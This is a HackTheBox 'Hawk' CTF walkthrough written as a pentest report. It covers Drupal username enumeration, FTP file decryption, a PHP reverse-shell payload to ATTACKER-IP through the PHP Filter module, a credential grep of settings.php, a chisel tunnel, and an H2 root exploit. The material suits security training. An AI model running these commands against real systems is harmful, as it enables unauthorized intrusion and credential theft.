Hawk CTF Writeup
Table of Contents
ToggleThis is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Hawk CTF from HackTheBox. The writeup takes the form of a detailed pentest report.
Hawk CTF
Hawk CTF is a medium to hard difficulty machine, which provides excellent practice in pentesting Drupal. The exploitable H2 DBMS installation is also realistic as web-based SQL consoles (RavenDB etc.) are found in many environments. The OpenSSL decryption challenge increases the difficulty of this machine.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.
Executive Summary
Introduction
This document shows the results of a security assessment performed on the Hawk machine (IP: 10.10.10.102). The report provides a comprehensive analysis of the findings, including vulnerability explanations, severity ratings, and steps to reproduce the identified vulnerabilities.
Objective
The assessment sought to identify vulnerabilities that could potentially lead to unauthorized access, data compromise, or privilege escalation. By conducting controlled exploitation scenarios, the assessment aimed to highlight the impact of these vulnerabilities and provide actionable recommendations for remediation.
Requirements
The assessment was conducted with the following requirements in mind:
- Identify vulnerabilities within the Drupal CMS installation.
- Exploit vulnerabilities to demonstrate potential impact.
- Assess the effectiveness of access controls and authentication mechanisms.
- Demonstrate privilege escalation from user-level to root.
- Provide detailed vulnerability explanations, severity ratings, and remediation recommendations.
High-Level Summary
The assessment uncovered several vulnerabilities within the Hawk machine:
- User Enumeration via Password Reset Error Message (Moderate Severity)
- Credentials Exposed via
.drupal.txt.enc
Decryption (High Severity) - Initial Access via PHP Filter Module on Drupal CMS (High Severity)
- Cleartext Credentials Disclosure that led to LPE to "daniel" user (High Severity)
- Outdated software that led to LPE to root - H2 Database Console (Extreme Severity)
Detailed Findings
Detailed vulnerability explanations, vulnerability fixes, severity ratings, and steps to reproduce the identified vulnerabilities are documented in "Independent Challenge" section.
Recommendations
Based on the assessment findings, the following recommendations are advised to enhance the security posture of the Hawk machine:
- CMS Security: Remove unnecessary modules, such as the PHP Filter Module, to reduce attack surface. Implement 2FA.
- Insecure Practices Related to Credentials: Enforce strong password policies and avoid password reuse, and review and improve the encryption and storage of sensitive files containing credentials.
- FTP Security: Implement proper access controls for the FTP service.
- Update H2 Database Console: Regularly update H2 Database to the latest version to mitigate known vulnerabilities.
Methodology
Behind Security's penetration test followed a comprehensive and structured methodology, incorporating the following key phases:
Reconnaissance: The initial phase involved gathering information about open ports.
Enumeration: In this phase, Behind Security conducted an in-depth enumeration of the target system, identifying exposed services, web server directories, and potential entry points for further analysis.
Vulnerability Assessment: Automated scanning tools and manual techniques were employed to identify potential security vulnerabilities in the web application and server configuration.
Exploitation: Vulnerabilities that posed significant risks were further exploited to verify their impact on the system's security.
Post-Exploitation: In the final phase, Behind Security attempted to escalate privileges and gain deeper access to the system, simulating real-world attack scenarios.
Color Legend
Console color legend:
Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity
Risk Classification
Independent Challenge - 10.10.10.102
Service Enumeration
IP Address | Ports Open |
---|---|
10.10.10.102 | TCP: 21, 22, 80, 5435, 8082, 9092 |
Web Server Enumeration (TCP: 80)
Running Apache httpd 2.4.29.
CMS Enumeration
The droopescan tool identified plugins, themes, and possible version information, including the default admin login URL. The command used was: droopescan scan drupal -u http://10.10.10.102
Username enumeration
Vulnerability Explanation: The web application's error message during a password reset request (at /user/password) exposes valid usernames on the system. This provides attackers with a list of valid accounts, facilitating targeted attacks.
Vulnerability Fix: Modify the error message to avoid disclosing valid usernames. Implement proper error handling and validation.
Severity: Moderate
Steps to Reproduce the Finding:
- Run the command:
wfuzz -d "name=FUZZ&form_build_id=form-0SR6gkn5bmPLfm6PeBEdlOna5oOMAsN2YUFI21ja-iM&form_id=user_pass&op=E-mail+new+password" -w /usr/share/seclists/Usernames/Names/names.txt -H "Content-Type: application/x-www-form-urlencoded" --hc 200 http://10.10.10.102/user/password
- Analyze the responses to identify valid usernames.
FTP Enumeration (TCP: 21)
Anonymous Login and Data Leakage
Vulnerability Explanation: Anonymous login is enabled on the FTP server, allowing unauthorized access. An encrypted file .drupal.txt.enc
containing potentially sensitive data was discovered. After downloading the file, Behind Security was able to crack it using a tool named "bruteforce-salted-openssl" and reveal the credentials for the admin user of Drupal CMS.
Vulnerability Fix: Disable anonymous FTP login. Review and improve the encryption and storage of sensitive files.
Severity: High
Steps to Reproduce the Attack:
- Log into the FTP server by leveraging the anonymous login capability. To do so, type the command
ftp [email protected]
and press enter when prompted for password. - Download the encrypted file at
messages/.drupal.txt.enc
. - Decode from base64 and save to another file by running the command:
cat .drupal.txt.enc | base64 -d > drupal.txt
- Locally, crack the decryption password using the command:
bruteforce-salted-openssl -f /usr/share/wordlists/rockyou.txt -d SHA256 -t 5 drupal.txt
- After retrieving the decryption password (
REDACTED
), use it to retrieve the contents of the file. The command is:openssl enc -aes-256-cbc -d -in drupal.txt -out decrypted.txt -k friends
- Now you can log in as admin using the password (
REDACTED
) to Drupal CMS on port 80.
Initial Access - Tricking the CMS to Execute Malicious PHP Code
Vulnerability Explanation: Behind Security gained access to the Drupal CMS as an admin and exploited the PHP Filter Module to execute malicious PHP code.
Vulnerability Fix: Disable the PHP Filter Module altogether and conduct a thorough review of user permissions to prevent unauthorized code execution.
Severity: High
Steps to Reproduce the Attack:
- Log in as admin with the previously discovered password.
- Go to Modules -> (Check) PHP Filter -> Save configuration.
- Then, Add content -> Select Basic Page or Article and insert malicious php code in the body. In this case,
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER-IP/PORT 0>&1 '"); ?>
- Select PHP code in Text format and then select Preview.
Post-Exploitation
Privilege Escalation to "daniel"
Vulnerability Explanation: Behind Security conducted further enumeration and discovered credentials for a user named "daniel" by analyzing configuration files related to Drupal CMS.
Vulnerability Fix: Enforce unique and strong credentials for each user account. Avoid reusing passwords across different services.
Severity: High
Steps to Reproduce the Attack:
- Behind Security executed the following command:
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
- The credentials for the user "daniel" were identified.
- Behind Security was able to log in via SSH as
[email protected]
, specifying the password:REDACTED
Privilege Escalation to root
Vulnerability Explanation: Behind Security established a TCP tunnel using the tool "chisel" and exploited a vulnerability in the H2 Database version 1.4.196 to gain root access.
Vulnerability Fix: Regularly update and patch software components, including databases, to fix known vulnerabilities.
Severity: Extreme
Steps to Reproduce the Attack:
- Behind Security established a TCP tunnel between their machine and the victim machine using the tool chisel:
./chisel server -p 1337 --reverse --socks5 &
(attacker) and./chisel client ATTACKER-IP:1337 R:socks &
(victim). - Behind Security accessed the H2 Database Console (
localhost:8082
) through the tunnel. - The attacker exploited the H2 Database vulnerability using a public exploit. The command used during the engagement was:
proxychains4 python 45506.py -H localhost:8082
Conclusion
Behind Security successfully executed malicious PHP code within the CMS, escalated privileges to user “daniel”, and further exploited vulnerabilities in the H2 Database to gain root access. These findings underscore the importance of regularly updating and securing software components, implementing proper access controls, and maintaining strong authentication practices to mitigate the risk of unauthorized access and privilege escalation. Remediation measures should be promptly applied to address the identified vulnerabilities and enhance the security posture of the system.
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!